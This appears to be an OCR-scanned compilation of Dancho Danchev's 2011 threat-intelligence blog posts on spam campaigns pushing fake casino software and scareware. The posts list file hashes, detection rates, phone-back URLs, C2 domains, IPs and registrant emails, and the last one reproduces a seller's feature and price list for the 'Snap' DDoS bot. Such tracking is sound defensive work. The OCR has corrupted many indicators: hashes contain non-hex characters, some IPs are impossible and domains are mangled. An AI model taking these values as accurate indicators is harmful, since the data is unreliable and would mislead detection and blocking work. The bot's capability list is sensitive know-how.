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7.4.3 Don’t Play Poker on an Infected Table - Part Four (2011-04-11 18:10) 


” Vegas VIP Casino - Mozilla Firefox —3Xx% 
Bile Edit View History Bookmarks Tools Help 


} Nttp://crazy-plays-roulette. ru/ 


@ Getting Started ) Latest BBC Headlines 


295) DOrne - ay 


On your. first 10 deposits), 


Done 


A currently spamvertised campaign is enticing users into downloading and executing a 
fraudulent online gambling application known as VegasVIP setup.exe. 


Detection rate: 

VegasVIP setup.exe - [1]Win32/CazinoSilver - Result:16/42 (38.1 %) 

MD5 : 8680fa2868dd068f3c1d3995df105243 

SHAI1 : 4f3ecd72c223cf6e130377a3ecd9149232dc848b 

SHA256: 68ded50bf7c9b7f6961e6334b25fdad5d2369e461051d5a9falflebaadebld0e 


Upon execution, the sample phones back to: 


www.onlinevegas.com/download/update.php?dl=0af374526b7b6eb6c54bf92cb1d 1a236 
&status=10 


The spammers are earning revenue by participating in the BestCasinoPartner.com Affili- 
ate Program. More details: 
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"Turn Your Traffic Into BIG Monthly Cash! Join the BestCasinoPartner.com Affiliate Program 
and from the very start you will earn a HUGE 30 % of ALL player GROSS losses EVERY month, 
no matter what your volume is! That’s ALL player GROSS losses for the life of your referred 
players, with No Loss Carry-Forward! 


Refer an Affiliate: Get Even More. Earn 7 % override on the Casino Gross Revenue pay- 
ment made to the referred Affiliate for all players referred by your directly referred Affiliates - 
for the life of the player! Earn 5 % override on the Casino Gross Revenue payment made from 
your Web masters’ referrals! AND...we even go One Step Further — a THIRD tier! 


Here are the THREE levels that will earn you profits for the life EACH player: 


¢ Tier 1: 7 % override on the Casino Gross Revenue 
¢ Tier 2: 5 % override on the Casino Gross Revenue 


¢ Tier 3: 3 % override on the Casino Gross Revenue" 


* NLINEVEGAS.com ng 15% of the pot PLUS an extra $99 in Bonus Bucks. Check the tou | “LIVE SUPPORT} HELP & 
He KK KKK KK KK KKK KKK KKK KK KKK KKK? 


S: 
es «aS 


TOTAL PROGRESSIVE JACKPOT Vz, 
$1,577,333.47 eer 4 


* Promotions 
* Tournaments 


u * cites 
SK a 


Participating affiliate domains are: OnlineVegas.com; GoCasino.com; CrazySlots.com and 
GrandVegas.com 
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Related fraudulent online gambling domains part of the campaign: 
777fashionplays.ru 
777playsfashion.ru 
bankpremiumplays.ru 
bank-premium-plays.ru 
bestfortuneplays.ru 
best-fortune-plays.ru 
bestplaysfortune.ru 
best-plays-fortune.ru 
bingobonusplays.ru 
bonus-bingo-plays.ru 
bonusplaysbingo.ru 
bonus-plays-bingo.ru 
class-plays-world.ru 
class-world-plays.ru 
crazyplaysroulette.ru 
crazy-plays-roulette.ru 
crazyrouletteplays.ru 
crazy-roulette-plays.ru 
elit-grand-games.ru 
elit-plays-king.ru 
fashion-plays-vegas.ru 
fashion-vegas-plays.ru 
fiveplaysstar.ru 
fortunebestplays.ru 
fortune-best-plays.ru 
fortuneplaysbest.ru 
fortune-plays-best.ru 
fortune-plays-land.ru 
fortuneplaysparty.ru 
fortune-plays-party.ru 
games-elit-king.ru 
games-king-elit.ru 
gamespremiumbank.ru 
jokerplaysvegas.ru 
online-games-luxory.ru 
palaceplayscrystal.ru 
playsbankpremium.ru 
plays-bank-premium.ru 
playsbestfortune.ru 
plays-best-fortune.ru 
plays-bingo-bonus.ru 
playsbonusbingo.ru 
plays-bonus-bingo.ru 
playsclassworld.ru 
playscrazyroulette.ru 
plays-crazy-roulette.ru 
playscrystalpalace.ru 
plays-crystal-palace.ru 
playsfashion777.ru 
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playsfivestar.ru 
playsfortunebest.ru 
plays-fortune-party.ru 
playsonlineextra.ru 
plays-plaza-west.ru 
playspremiumbank.ru 
playsroulettecrazy.ru 
plays-roulette-crazy.ru 
plays-royal-classic.ru 
plays-star-five.ru 
playsvegasjoker.ru 
playswestplaza.ru 
plays-world-win.ru 
plaza-plays-west.ru 
plazawestplays.ru 
plaza-west-plays.ru 
premium-bank-plays.ru 
premiumplaysbank.ru 
roulette-crazy-plays.ru 
starfiveplays.ru 
star-five-plays.ru 
starplaysfive.ru 
vegas-fashion-plays.ru 
vegasjokergames.ru 
vegasjokerplays.ru 
vegas-joker-plays.ru 
vegas-plays-joker.ru 
westplaysplaza.ru 
west-plays-plaza.ru 
westplazaplays.ru 
west-plaza-plays.ru 
win-plays-world.ru 
winworldplays.ru 
win-world-plays.ru 
world-class-plays.ru 
world-plays-class.ru 


Related posts: 

[2]Don’t Play Poker on an Infected Table - Part Three 
[3]Don’t Play Poker on an Infected Table - Part Two 
[4]Don’t Play Poker on an Infected Table 


This post has been reproduced from [5]Dancho Danchev’s blog. Follow him [6Jon Twit- 
ter. 


1 
2. http: //ddanchev. blogspot . com/2010/03/dont-play-poker—on-infected-table-part . html 

3. hetp://adanchev.Plogapot.com/2010/02/dont-play-poker-on~ snfected-table-part. neal 

4. hetp:/ /ddanchev. blogspot .co®/2007 /09/dont=play-poker~ on infected-table tal 
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5. http: //ddanchev. blogspot .com/ 
6. http://twitter .com/danchodanche 


7.4.4 Spamvertised "Reqest Rejected" Campaign Serving Scareware 
(2011-04-12 20:22) 


> Windows Security Center 


Help protect your PC 


Security essentials 
Security Center helps you manage your Windows security settings. To help protect your computer, make sure 
the three security essentials are marked ON. If the settings are not ON, follow the recommendations. To 
* Get the latest security and virus return to the Security Center later, open Control Panel. 

information from Microsoft What's new in Windows to help or my computer? 


* Check for the latest updates from a z 
Windows Update == Firewall @ OFF «+ 


* Get support for security-related 
issues 


@ Resources 


XP Anti-Spyware 2011 reports that it is currently turned off. A firewall helps protect your computer from 
potentially harmful content on the Internet. Click Recommendations to learn how to fix this problem. 


* Get help about Security Center How firewall hy f my 2 


* Change the way Security Center 


alerts me w Automatic Updates @ON « 


F Virus Protection © OFF « 


XP Anti-Spyware 2011 reports that it is turned off. Antivirus software helps protect your computer against 
viruses and other security threats. Click Recommendations forsuggested actions you can take. 
How ntivirus software h f m a 


Manage security settings for: 


y) XP Anti-Spyware 2011 e Internet Options 


A currently spamvertised scareware-serving campaign is enticing end users into downloading 
and executing a malicious binary, which drops a scareware variant. 


Sample subject: Reqest rejected 

Sample message: "Dear Sirs, Thank you for your letter! Unfortunately we can not confirm 
your request! More information attached in document below. Thank you Best regards." 
Sample attachments: EX-38463.pdf.zip; EX-38463.pdf.exe 


Detection rate: 

EX-38463.pdf.exe - [1]TrojanDownloader:Win32/Chepvil.J - Result: 11/41 (26.8 %) 

MD5 : 5085794e6c283ebcfa3878805b9e7be7 

SHAI1 : 1fbd8d3b0a3479274d8f09543452bf724bcb245c 

SHA256: c03711dbafae9b296daed8720f997d84caa5e5a5407a689926050a061d67b932 


Upon execution downloads hdjfskh.net/ pusk.exe - 208.43.90.48 - Email: admin@firtryt. biz 


Detection rate: 
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pusk.exe - [2]FakeAlert-CN.gen.aa - Result: 13/42 (31.0 %) 

MD5 : a50a91176b5aeb96b8b77b99d587c485 

SHA1 : c56b7ab2123dbd49902446ffccOcf59d6a865857 

SHA256: c912a975e3c2fc911d6550d86e8fd89dbd30e3d1e07d788b45aacOd6cf61e83c 


Upon execution phones back to the following domains and ASs: 


78.46,105,20 

j 3.46,105,205 
sakafiduzipame.com 78.46.105,205 
tetagyjaj.com d 
wamojafadezy.com 

yger.com 
celisesuho.com 
vakyditefo.com 99, 198,114,203 
rorodarof.com 99,198,114.204 


mibuj.com 


fuj.com 


Phones back to : AS19875; AS8001; AS24940; AS32475; AS32097; AS19875 
2bemojewedowigo.com - 78.46.105.205 

bemolagqijicy.com - 99.198.114.206 - Email: vista@free-id.ru 

celisesuho.com - 99.198.114.202 - Email: hush@bz3.ru 

cixovatywo.com - 78.46.105.205 - Email: frenzy@ca4.ru 

fytypoqywu.com - 64.46.38.94 - Email: fy4371215910301@domainidshield.com 
gicyxepomer.com - 78.46.105.205 - Email: tabs@yourisp.ru 

gopilezavyxiro.com - 78.46.105.205 - Email: hush@bz3.ru 

hivanedak.com - 188.95.54.242 - Email: steps@ppmail.ru 
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hotilosire.com - 208.110.67.122 - Email: lathe@maillife.ru 
jerakidukojoz.com - 78.46.105.205 - Email: wrap@cheapbox.ru 
kupeqobujohaq.com - 64.46.38.145 - Email: soup@fastermail.ru 
kytevaviqopoci.com - 78.46.105.205 - Email: fs@free-id.ru 
pikilokykizanu.com - 65.254.54.77 - Email: dawn@free-id.ru 
punajytapaci.com - 209.97.213.105 - Email: mire@maillife.ru 
qisacugugu.com - 64.46.38.129 - Email: as@free-id.ru 
qupajubica.com - 78.46.105.205 - Email: heard@bz3.ru 
reruravobosila.com - 67.196.13.96 - Email: mon@ppmail.ru 
rorodarof.com - 99.198.114.204 - Email: hush@bz3.ru 
ruqydahec.com - 67.196.13.97 - Email: mon@ppmail.ru 
sakafiduzipame.com - 78.46.105.205 - Email: build@ca4.ru 
sykobodyducib.com - 208.110.67.102 - Email: lathe@maillife.ru 
tetagyjaj.com - 78.46.105.205 - Email: kilt@bz3.ru 
tibehewuk.com - 209.97.213.102 - Email: mon@ppmail.ru 
tisatosyhimidy.com - 188.95.54.243 - Email: jan@free-id.ru 
tyhiqymiwufuj.com - 208.110.67.121 - Email: dawn@free-id.ru 
vakyditefo.com - 99.198.114.203 - Email: vista@free-id.ru 
wamojafadezy.com - 78.46.105.205 - Email: acts@free-id.ru 
wetotyger.com - 78.46.105.205 - Email: acts@free-id.ru 
wixecyhobovy.com - 64.46.38.130 - Email: soup@fastermail.ru 
wolycunanoge.com - 72.9.233.98 - Email: lathe@maillife.ru 
zajatimibuj.com - 208.110.67.119 - Email: bark@cheapbox.ru 
zequcitamado.com - 99.198.114.205 - Email: vista@free-id.ru 
punajytapaci.com/1017000412 - 209.97.213.105 - Email: mire@maillife.ru 
tibehewuk.com/1017000412 - 209.97.213.102 - Email: mon@ppmail.ru 


Monitoring of the campaign is ongoing. 


This post has been reproduced from [3]Dancho Danchev’s blog. Follow him [4]on Twit- 
ter. 


1. ttp://www.virustotal.com/file-scan/report.htm1?id=c03711dbafae9b296daed87 20f 997d84caa5e5a5407a689926050a 


061d67b932- 1302627694 


2. ttp://www.virustotal.com/file-scan/report.html1?id=c912a975e3c2fc911d6550d86e8f d89dbd30e3d1e07d788b45aac0 


d6cf61e83c- 130262744 
. http: //ddanchev. blogspot .com/ 


3 
4. http://twitter.com/danchodanche 


7.4.5 Spamvertised "Successfull Order 977132" Leads to Scareware (2011-04-28 14:50) 


ag 
BOBIJOU 


A currently ongoing malware campaign is impersonating Bobijou Inc for malware-serving 
purposes. 
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Sample subject: "Successfull Order 977132" 
Sample message: "Thank you for ordering from Bobijou Inc.This message is to inform you that 
your order has been received and is currently being processed. 


Your order reference is 901802. You will need this in all correspondence. This receipt is 
NOT proof of purchase. We will send a printed invoice by mail to your billing address. 


You have chosen to pay by credit card. Your card will be charged for the amount of 
262.00 USD and “Bobijou Inc.” will appear next to the charge on your statement. You will 
receive a separate email confirming your order has been despatched.Your purchase and 
delivery information appears below in attached file. 


Thanks again for shopping at Bobijou Inc." 
Sample attachments: Order _details.zip 


Detection rates: 

Order details.exe - [1]Trojan.FakeAV - Result: 24/40 (60.0 %) 

MD5 : 7c810cbb47c9f937b5f663b51lab7ee50 

SHAI1 : b4faf8c724727381abb11c44b71605ff6e65cbbf 

SHA256: Obda3bdcffdda0fee31fe35cfea2fb644ff8e549a0a83632faal9cd43e02b904 


Upon execution phones back to : 
kkojjors.net/f/g.php - 95.64.9.15 - Email: admin@firtryt. biz 
variantov.com/pusk.exe - 94.63.149.26 - Email: admin@variantov.com 


Detection rate for the scareware variant pusk.exe 

pusk.exe - [2]Suspicious.Cloud.5 - Result: 4/41 (9.8 %) 

MD5 : bbd466a67586003776e295eaf3d2976c 

SHA1 : 6a8e1d84157c76b4c9238fc23d28686244f6650f 

SHA256: ee008f9039534f062bd277860060461064e760bdaa90a36595b9780be54a5a05 
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tozibapah.com 
gebinehuh.com 
gygipikalyn.com 
xygorinazecit,.com 
walireqoxyxyt.com 
moririnejuF.com 
jydosucin.com 
libynozegokido,com 
zidacofodafur.com 


Fequxukovo,com 
gyxygimacik.com 


oO 


64.46,39,185 
64.46,.39,184 
64.46.39.200 
64.46,39,.186 
64.46.39.212 
67,196,15.136 


67,196,15.138 


67,196,15,137 
67,196,15.139 
67,.196,15,141 

.196,.15.140 
67.196,15,105 


104 


Upon execution phones back to: 

jyluzovunevu.com - 209.160.45.33 - Email: gray@fxmail.net 
sesokiqufikeg.com - 209.160.45.34 - Email: gray@fxmail.net 
qayqinisope.com - 64.46.38.207 - Email: gray@fxmail.net 
hijocyragap.com - 64.46.38.81 - Email: robin@cutemail.org 
puhigygapyhi.com - 64.46.38.81 - Email: gray@fxmail.net 
zavewuzykubo.com - 64.46.38.80 - Email: robin@cutemail.org 
fepigixypo.com - 64.46.38.29 - Email: pyre@cutemail.org 
tozibapah.com - 76.73.16.182 - Email: lays@fxmail.net 
qebinehuh.com - 76.73.14.182 - Email: lays@fxmail.net 
gygipikalyn.com - 76.73.17.242 - Email: ss@cutemail.org 
xygorinazecit.com - 76.73.17.70 - Email: ss@cutemail.org 
walireqoxyxyt.com - 64.46.39.185 - Email: orbit@fxmail.net 
moririnejuf.com - 64.46.39.184 - Email: purse@mail13.com 
jydosucin.com - 64.46.39.200 - Email: arm@fxmail.net 
libynozegokido.com - 64.46.39.186 - Email: orbit@fxmail.net 
zidacofodafur.com - 64.46.39.212 - Email: gown@cutemail.org 
fequxukovo.com - 67.196.15.136 - Email: arm@fxmail.net 
gyxyqimacik.com - 67.196.15.138 - Email: purse@mail13.com 
wizyvopyla.com - 67.196.15.137 - Email: arm@fxmail.net 
gyricehagupy.com - 67.196.15.139 - Email: purse@mail13.com 
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punemipagqatyc.com - 67.196.15.141 - Email: ulcer@mailae.com 
gehotigyry.com - 67.196.15.140 - Email: ho@mail13.com 
vufekihoto.com - 67.196.15.105 - Email: arm@fxmail.net 
huzomohidid.com - 67.196.15.104 - Email: arm@fxmail.net 
posufejez.com - 67.196.15.107 - Email: purse@mail13.com 
gewexyvunokyk.com - 67.196.15.106 - Email: purse@mail13.com 
fowyqypacytucy.com - 209.160.45.32 - Email: soup@fastermail.ru 
koduzuwobow.com - 209.160.45.130 - Email: pyre@cutemail.org 
ciluvekypomow.com - 78.46.105.205 - Email: hips@cutemail.org 
7hitaxodupi.com - 64.46.38.30 


Monitoring of the campaign is ongoing. 


Related posts: 

[3]Spamvertised "Reqest Rejected" Campaign Serving Scareware 
[4]Spamvertised DHL Notifications Scareware Campaign 
[5]Spamvertised Post Office Express Mail (USPS) Emails Serving Malware 
[6]Spamvertised United Parcel Service notifications serve malware 
[7]Spamvertised FedEx Notifications Spread Malware 

[8]Spamvertised DHL Notification Malware Campaign 

[9]More Spamvertised DHL Notifications Spread Malware 


This post has been reproduced from [10]Dancho Danchev’s blog. Follow him 
[11]Jon Twitter. 


1 

2. ttp://www.virustotal.com/file-scan/report .html?id=ee008f 9039534f 062bd277860060461064e760bdaa90a36595b978 
"cep: //ddanchev. bLogepet, con/2011/04/epanvertised-reqest~rejected- campaign. heal 

_hotp://ddanchev blogspot .com/2011/04/spanvertssed-dhl-noti fications. hta 

_ hep: //adanchev. blogspot. con/2011/03/epanvertised-post-office-express-nail tal 


ttp://ddanchev.blogspot.com/2011/03/spamvertised-united-parcel-service.htm 
ttp://ddanchev. blogspot .com/2011/03/spamvertised-fedex-notifications-spread. htm 


ttp://ddanchev.blogspot.com/2011/03/spamvertised-dhl-notificication-malware.htm 


. http: //ddanchev.blogspot.com/2011/03/more-spamvertised-dhl-notifications.htm 
10. http://ddanchev. blogspot .com/ 
11. http://twitter .com/danchodanche 


S119 


7.5 May 


7.5.1 Summarizing ZDNet’s Zero Day Posts for April (2011-05-09 12:50) 


le 


The following is a brief summary of all of my posts at ZDNet’s Zero Day for April. You can 
subscribe to my [1]personal RSS feed, [2]Zero Day’s main feed, or follow me on Twitter: 


Recommended reading: 


¢ [3] Netcraft survey indicates slow adoption of Extended Validation SSL certificates 
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01. [4]Spamvertised "Reqest Rejected" campaign leads to scareware 

02. [5]Spamvertised Facebook. Your password has been changed!’ emails lead to malware 
03. [6]Malware Watch: ’Spam is sent from your FaceBook account’; Spamvertised malicious 
photos 

04. [7]Spamvertised Easter Greetings lead to malware 

05. [8]Netcraft survey indicates slow adoption of Extended Validation SSL certificates 

06. [9]’You’ve got a postcard’ emails lead to exploits and scareware 

07. [10]Fake antivirus for mobile platform spotted 


This post has been reproduced from [11]Dancho Danchev’s blog. Follow him 
[12]Jon Twitter. 


1. http://www.zdnet .com/topics/danchotdanchev?o=1émode=rssktag=mantle_skin;content 


2. http://feeds.feedburner.com/zdnet/securit 


icious-photos/8565 
7. http://www.zdnet .com/blog/security/spamvertised-easter-greetings—lead-to-malware/8571 


ificates/8576 


9. http: //www.zdnet.com/blog/security/youve-got-a-postcard-emails-lead-to-exploits-and-scareware/8590 


10. http://www.zdnet .com/blog/security/fake-antivirus-for-mobile-platform-spotted/8594 
11. http://ddanchev. blogspot .com/ 
12. http://twitter.com/danchodanche 
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7.5.2 Don’t Play Poker on an Infected Table - Part Five (2011-05-09 15:52) 


Pe Birt hed OM led ed ee 


Home Promotions Download 


BONUS 


PLAY NOW 


320 CASINO GAMES 
TO CHOOSE FROM 


A currently spamvertised campaign is enticing end users into downloading a fraudulent online 
gambling application KingSpinEN.exe. The campaign is part of last month’s [1]Don’t Play 
Poker on an Infected Table - Part Four series. 


Detection rate: 

KingSpinEN.exe - [2]W32/Casino.F.gen!Eldorado - Result:16/43 (37.2 %) 

MD5 : ead8156a838842bc8463995a91leee08b 

SHA1 : 239594a514c461c63dc8da69b08b9b63baaf2579 

SHA256: 491c291leaed67268d14a36470e5d6f6d4ed829055fe4a2897ac5f050b50a2e36 


Upon execution phones back to: 

- download.thepalacegroupgaming.com /tracking.aspx?ul=en &casino=spinpalace &banner 
_tag=a20337 &uuid= %7b9F9E0585-9340-45C0-9EC7-46FBE5E7127F %7d &state=100 

- spinpalace.mgsmup.com /mupp/spinpalace/spinpalace _install.cab 

- Spinpalace.mgsmup.com /mupp/spinpalace/spinpalace.cab 

- download.thepalacegroupgaming.com /tracking.aspx?ul=en &casino=spinpalace &banner 
_tag=a20337 &uuid= %7b9F9E0585-9340-45C0-9EC7-46FBE5E7127F %7d &state=422 

- marketing.valueactive.eu /VIP/animations/en/movies _en.htm 


Portfolio of fraudulent online gambling domains part of the campaign. The majority are 
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hosted within AS49130, ARNET-AS SC ArNet Connection SRL: 


casino-elit-superru - 89.45.14.12 
casinogoldsuperru - 89.45.14.12 
casinokingsuper.ru - 89.45.14.12 
casino-king-superru - 89.45.14.12 
casinolabsuper.ru - 89.45.14.12 
casino-lux-supenru - 89.45.14.12 
casinomultisuper.ru - 89.45.14.12 
casinonetsuper.ru - 89.45.14.12 
casino-net-superru - 89.45.14.12 
casinonextvip.ru - 89.45.14.12 
casino-online-super.ru - 90.182.175.234 
casinopartysuper.ru - 90.182.175.234 
casino-party-super.ru - 90.182.175.234 
casinoplazasuper.ru - 900.182.175.234 
lcasinostarsuperru - 90.182.175.234 
casinosuperelit.ru - 89.45.14.12 
casino-super-elit.ru - 89.45.14.12 
casinosuperking.ru - 89.45.14.12 
casino-super-king.ru - 89.45.14.12 
casinosupermulti.ru - 89.45.14.12 
casinosupernet.ru - 89.45.14.12 
casino-super-net.ru - 89.45.14.12 
casino-super-online.ru - 90.182.175.234 
casinosupervip.ru - 89.45.14.12 
casino-super-vip.ru - 89.45.14.12 
casinosuperweb.ru - 89.45.14.12 
casino-super-web.ru - 89.45.14.12 
casinosuperwin.ru - 89.45.14.12 
casino-super-win.ru - 89.45.14.12 
casinovipsuperru - 89.45.14.12 
casino-vip-super.ru - 89.45.14.12 
casino-win-super.ru - 89.45.14.12 
cazino-cash-multi.ru - 89.45.14.12 
3cazino-party-royal.ru - 89.45.14.12 
cazinopartyweb.ru - 89.45.14.12 
cazino-party-web.ru - 89.45.14.12 
cazinopartywin.ru - 89.45.14.12 
cazino-party-win.ru - 89.45.14.12 
cazinoplazawin.ru - 89.45.14.12 
cazinoplazaworld.ru - 89.45.14.12 
cazino-plaza-world.ru - 89.45.14.12 
cazinowinplaza.ru - 89.45.14.12 
cazino-win-plaza.ru - 89.45.14.12 
cazinoworldplaza.ru - 89.45.14.12 
cazino-world-plaza.ru - 89.45.14.12 
4elitcasinosuper.ru - 89.45.14.12 
elit-casino-superru - 89.45.14.12 
elitsupercasino.ru - 89.45.14.12 
elit-super-casino.ru - 89.45.14.12 
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gamelabonline.ru - 78.46.105.205 
gameonlinelab.ru - 78.46.105.205 
game-party-royal.ru - 78.46.105.205 
gamezlabonline.ru - 89.45.14.12 
gamezmultilab.ru - 89.45.14.12 
gamez-net-online.ru - 89.45.14.12 
gamezonlinenet.ru - 89.45.14.12 
gamez-party-royal.ru - 89.45.14.12 
gamez-party-web.ru - 89.45.14.12 


* cazino-plays-labv.ru 


* supercarepharmacyw.ru 


cazino-plays-labvru 


golden-gamez-lord.ru 
89.45.14.0/24 ——“S-ge as4g9130 


nsl.accounterlisternet 


ns2.accounterlister.net 


ns3.accounterlisternet 


partycazinonetru 


gamezpartywin.ru - 89.45.14.12 
gamez-party-win.ru - 89.45.14.12 
gamez-plaza-win.ru - 89.45.14.12 
gamezplazaworld.ru - 89.45.14.12 
gamez-plaza-world.ru - 89.45.14.12 
gamez-vegas-web.ru - 89.45.14.12 
gamezweblab.ru - 89.45.14.12 
gamezwinplaza.ru - 89.45.14.12 
gamez-win-plaza.ru - 89.45.14.12 
gamezworldplaza.ru - 89.45.14.12 
joker-gamez-web.ru - 89.45.14.12 
kingcasinosuper.ru - 89.45.14.12 
king-casino-superru - 89.45.14.12 
kinggagnerr.net - 90.182.175.234 
kingsupercasino.ru - 89.45.14.12 
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king-super-casino.ru - 89.45.14.12 
lab-cazino-multi.ru - 89.45.14.12 
lab-cazino-online.ru - 89.45.14.12 
labgamezonline.ru - 89.45.14.12 
lab-gamez-web.ru - 89.45.14.12 
labonlinecazino.ru - 89.45.14.12 
labonlinegame.ru - 78.46.105.205 
labvegascazino.ru - 89.45.14.12 
luxcasinosuperru - 89.45.14.12 
luxnextcasino.ru - 89.45.14.12 
lux-next-casino.ru - 89.45.14.12 
multicasinosuperru - 89.45.14.12 
multilabgame.ru - 78.46.105.205 
multisupercasino.ru - 89.45.14.12 
netcasinosuper.ru - 89.45.14.12 
net-casino-super.ru - 89.45.14.12 
netpartycazino.ru - 89.45.14.12 
netsupercasino.ru - 89.45.14.12 
net-super-casino.ru - 89.45.14.12 
nextcasinovip.ru - 89.45.14.12 
next-casino-vip.ru - 89.45.14.12 
next-lux-casino.ru - 89.45.14.12 
nextvipcasino.ru - 89.45.14.12 
onlinecasinosupenru - 900.182.175.234 
online-casino-super.ru - 90.182.175.234 
online-cazino-lab.ru - 89.45.14.12 
onlinegameznet.ru - 89.45.14.12 
online-gamez-vip.ru - 89.45.14.12 
onlinelabcazino.ru - 89.45.14.12 
onlinesupercasino.ru - 90.182.175.234 
online-super-casino.ru - 90.182.175.234 
partycasinosuper.ru - 900.182.175.234 
party-casino-web.ru - 78.46.105.205 
partycazinonet.ru - 89.45.14.12 
party-cazino-royal.ru - 89.45.14.12 
partycazinoweb.ru - 89.45.14.12 
partycazinowin.ru - 89.45.14.12 
partygamezroyal.ru - 89.45.14.12 
party-gamez-royal.ru - 89.45.14.12 
partygamezwin.ru - 89.45.14.12 
party-gamez-win.ru - 89.45.14.12 
partynetcazino.ru - 89.45.14.12 
party-royal-cazino.ru - 89.45.14.12 
party-super-casino.ru - 89.45.14.12 
partywebcasino.ru - 78.46.105.205 
partywebcazino.ru - 89.45.14.12 
partywincazino.ru - 89.45.14.12 
party-win-cazino.ru - 89.45.14.12 
play-multi-casino.ru - 89.45.14.12 
plazacazinowin.ru - 89.45.14.12 
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plaza-cazino-win.ru - 89.45.14.12 
plazacazinoworld.ru - 89.45.14.12 
plaza-cazino-world.ru - 89.45.14.12 
plaza-gamez-win.ru - 89.45.14.12 
plazagamezworld.ru - 89.45.14.12 
plaza-gamez-world.ru - 89.45.14.12 
plazawincazino.ru - 89.45.14.12 
plaza-win-cazino.ru - 89.45.14.12 
plazaworldcazino.ru - 89.45.14.12 
plaza-world-cazino.ru - 89.45.14.12 
royal-party-cazino.ru - 89.45.14.12 
star-casino-supenru - 90.182.175.234 
star-super-casino.ru - 90.182.175.234 
super-casino-elit.ru - 89.45.14.12 
supercasinoking.ru - 89.45.14.12 
super-casino-king.ru - 89.45.14.12 
supercasinolab.ru - 89.45.14.12 
super-casino-land.ru - 90.182.175.234 
supercasinomulti.ru - 89.45.14.12 
supercasinonet.ru - 89.45.14.12 
super-casino-net.ru - 89.45.14.12 
supercasinoonline.ru - 90.182.175.234 
super-casino-online.ru - 90.182.175.234 
super-casino-star.ru - 90.182.175.234 
supercasinovip.ru - 89.45.14.12 
super-casino-vip.ru - 89.45.14.12 
super-casino-web.ru - 89.45.14.12 
super-casino-west.ru - 90.182.175.234 
supercasinowin.ru - 89.45.14.12 
super-casino-win.ru - 89.45.14.12 
super-elit-casino.ru - 89.45.14.12 
superkingcasino.ru - 89.45.14.12 
super-king-casino.ru - 89.45.14.12 
super-land-casino.ru - 90.182.175.234 
super-multi-casino.ru - 89.45.14.12 
supernetcasino.ru - 89.45.14.12 
super-net-casino.ru - 89.45.14.12 
superonlinecasino.ru - 90.182.175.234 
super-online-casino.ru - 90.182.175.234 
superpartycasino.ru - 90.182.175.234 
super-party-casino.ru - 89.45.14.12 
superstarcasino.ru - 90.182.175.234 
super-star-casino.ru - 90.182.175.234 
super-vip-casino.ru - 89.45.14.12 
super-web-casino.ru - 89.45.14.12 
super-west-casino.ru - 90.182.175.234 
superwincasino.ru - 89.45.14.12 
vegas-game-web.ru - 78.46.105.205 
vegas-gamez-multi.ru - 89.45.14.12 
vegasgamezweb.ru - 89.45.14.12 
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vipcasinosuper.ru - 89.45.14.12 
vip-casino-super.ru - 89.45.14.12 
vipnextcasino.ru - 89.45.14.12 
vipsupercasino.ru - 89.45.14.12 
vip-super-casino.ru - 89.45.14.12 
web-casino-superru - 89.45.14.12 
web-cazino-royal.ru - 89.45.14.12 
webgamezroyal.ru - 89.45.14.12 
webpartycazino.ru - 89.45.14.12 
web-super-casino.ru - 89.45.14.12 
west-super-casino.ru - 90.182.175.234 
wincasinosuper.ru - 89.45.14.12 
win-casino-supenru - 89.45.14.12 
win-cazino-plaza.ru - 89.45.14.12 
win-gamez-plaza.ru - 89.45.14.12 
winpartycazino.ru - 89.45.14.12 
win-party-cazino.ru - 89.45.14.12 
winplazacazino.ru - 89.45.14.12 
win-plaza-cazino.ru - 89.45.14.12 
winsupercasino.ru - 89.45.14.12 
win-super-casino.ru - 89.45.14.12 
worldcazinoplaza.ru - 89.45.14.12 
world-cazino-plaza.ru - 89.45.14.12 
worldgamezplaza.ru - 89.45.14.12 
world-gamez-plaza.ru - 89.45.14.12 
world-plaza-cazino.ru - 89.45.14.12 


Monitoring of the campaign is ongoing. 


Related posts: 

[3]Don’t Play Poker on an Infected Table - Part Four 
[4]Don’t Play Poker on an Infected Table - Part Three 
[5]Don’t Play Poker on an Infected Table - Part Two 
[6]Don’t Play Poker on an Infected Table 


This post has been reproduced from [7]Dancho Danchev’s blog. Follow him 
[8]on Twitter. 


1. 
2. ttp://www.virustotal.com/file-scan/report .html?id=491c291eaed67268d14a36470e5d6f 6d4ed829055f e4a2897ac5f0 
3. 
4 
5. 
6. 
7. 
8. 


ttp://ddanchev. blogspot .com/ 
ttp://twitter .com/danchodanche 
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7.5.3 A Peek Inside a New DDoS Bot - "Snap" (2011-05-09 17:03) 


Sampling malicious activity through the eyes of the cybercriminal, is always beneficial in the 
context of timely spotting valuable trends and fads within the ecosystem, given a decent 
sample of malicious activity is obtained. 


In this post, we’ll review a new DDoS bot on the block - "Snap". 


This modular bot differentiates itself by offering the ability to choose between different 
modules to be added to the final package, and by allowing to perform to "proprietary" DDoS 
functions, namely the TurboSYN, and TrafficDDoS. Next to its core DDoS functionality, the 
coder of the bot is differentiating by offering Form Grabbing; Reverse Socks; MailSpamming; 
IM-Spamming and Exploits launching functionality. 


More details from the actual proposition: 
[+] language the bot is coded in : mASM 
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[+] no external depencies, no run times , no frame works! 

[+] Ability to work with roaming user accounts 

[+] modularized structure of the bot 

[+] Second Backup Service watch process Activity and restart bot on fail over 
[+] User Mode r0Otkit 

-> [+] run’s as a service and hides itself 

-> [+] hides & protect root process 

-> [+] hides & protect files 

-> [+] hides the root processes 

-> [+] hides already used local &remote TCP Port(s) 

-> [+] hides already used local &remote UDP Port(s) 

-> [+] hides already used regkey’s 

[+] semi polymorphic architecture 

-> [+] uses random legit process, file & service names 

-> [+] generates a unique stub every run 

[+] bot doesn’t use eof, has no import table, doesnt need relocation and tls section => very 
good crypter support 

[+] Unicode support for Asian pcs 

[+] detects common sandboxes, virtual OSs, emulators, and analysis tools 


=—====— === >=] >=| Webpanel ==>- 


[+] the webpanel is developed with dreamweaver cs5 and ajax framework using mysql 
and php 

[+] multi theme support available 

[+] multi command support => every victim can do as many threads as you want it to 

[+] reliable protocol which creates the lowest possible server load 

[+] modularized structure of the bot 


[===[ Modules J==- 
[+] Base price (Core) for 250 $ 


Loader: 
[+] Load module (simple) +0 $ 
[+] Load module (extended) for 50 $ 


Proxy: 
[+] Socks5 Deamon for 50 $ 
[+] reverse Socks 4/Socks 4a/Socks 5/ HTTP(s) for 150 $ 


DDoS: 
[+] DDoS Module (http/syn) for 50 $ 
[+] DDoS Module (full) for 100 $ 


DDoS(full) + Load module (extended) + Socks5 Deamon for 400 $ 


Related posts: 
[1]Coding Spyware and Malware for Hire 
[2]Will Code Malware for Financial Incentives 
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[3]E-crime and Socioeconomic Factors 


